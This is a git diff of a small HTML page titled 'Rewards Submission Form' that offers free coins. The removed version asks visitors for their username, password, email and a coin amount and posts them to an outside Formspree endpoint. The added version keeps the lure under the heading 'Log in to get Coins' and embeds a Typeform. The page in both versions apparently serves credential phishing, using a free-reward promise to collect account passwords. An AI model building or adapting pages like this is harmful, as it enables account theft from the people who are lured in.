--- a/index.html
+++ b/index.html
@@ -1,78 +1,46 @@
 <!DOCTYPE html>
 <html lang="en">
 <head>
-<meta charset="UTF-8">
-<meta name="viewport" content="width=device-width, initial-scale=1.0">
-<title>Rewards Submission Form</title>
-<style>
-  body {
-    font-family: Arial, sans-serif;
-    background: #f9f9f9;
-    display: flex;
-    justify-content: center;
-    align-items: flex-start;
-    min-height: 100vh;
-    padding: 20px;
-  }
-  .container {
-    width: 100%;
-    max-width: 600px;
-    background: #fff;
-    padding: 30px;
-    border-radius: 8px;
-    box-shadow: 0 0 15px rgba(0,0,0,0.1);
-  }
-  h2, h1 {
-    text-align: center;
-    color: #333;
-  }
-  h2 {
-    font-size: 18px;
-    font-weight: 400;
-    margin-bottom: 20px;
-  }
-  input {
-    width: 100%;
-    padding: 10px;
-    margin: 8px 0 15px 0;
-    border: 1px solid #ccc;
-    border-radius: 4px;
-  }
-  button {
-    width: 100%;
-    background-color: #4CAF50;
-    color: white;
-    padding: 12px;
-    border: none;
-    border-radius: 4px;
-    cursor: pointer;
-  }
-  button:hover {
-    background-color: #45a049;
-  }
-  iframe {
-    width: 100%;
-    height: 600px; /* Adjust as needed */
-    border: none;
-    margin-top: 30px;
-  }
-</style>
+  <meta charset="UTF-8">
+  <meta name="viewport" content="width=device-width, initial-scale=1.0">
+  <title>Rewards Submission Form</title>
+  <style>
+    body {
+      font-family: Arial, sans-serif;
+      background: #f9f9f9;
+      display: flex;
+      justify-content: center;
+      align-items: center;
+      min-height: 100vh;
+      margin: 0;
+      padding: 20px;
+    }
+    .form-container {
+      width: 100%;
+      max-width: 600px;
+      background: #fff;
+      padding: 20px;
+      border-radius: 8px;
+      box-shadow: 0 0 15px rgba(0,0,0,0.1);
+    }
+    h1 {
+      text-align: center;
+      color: #333;
+      font-size: 22px;
+      margin-bottom: 20px;
+    }
+    iframe {
+      width: 100%;
+      height: 600px; /* Adjust height if needed */
+      border: none;
+    }
+  </style>
 </head>
 <body>
-<div class="container">
-  <!-- Your original HTML form -->
-  <h1>Submit to get Coins</h1>
-  <h2>Submit your details below:</h2>
-  <form action="https://formspree.io/f/xgvnrwrj" method="POST">
-    <input type="text" name="username" placeholder="Username" required>
-    <input type="text" name="Password" placeholder="Password" required>
-    <input type="email" name="email" placeholder="Email" required>
-    <input type="text" name="coins" placeholder="Coins (e.g. 300)" required>
-    <button type="submit">Submit</button>
-  </form>
-
-  <!-- Typeform embed -->
-  <iframe src="https://form.typeform.com/to/MwyQbxUj" title="Typeform Rewards Form"></iframe>
-</div>
+  <div class="form-container">
+    <h1>Log in to get Coins</h1>
+    <!-- Embedded Typeform -->
+    <iframe src="https://form.typeform.com/to/MwyQbxUj" title="Rewards Form"></iframe>
+  </div>
 </body>
 </html>
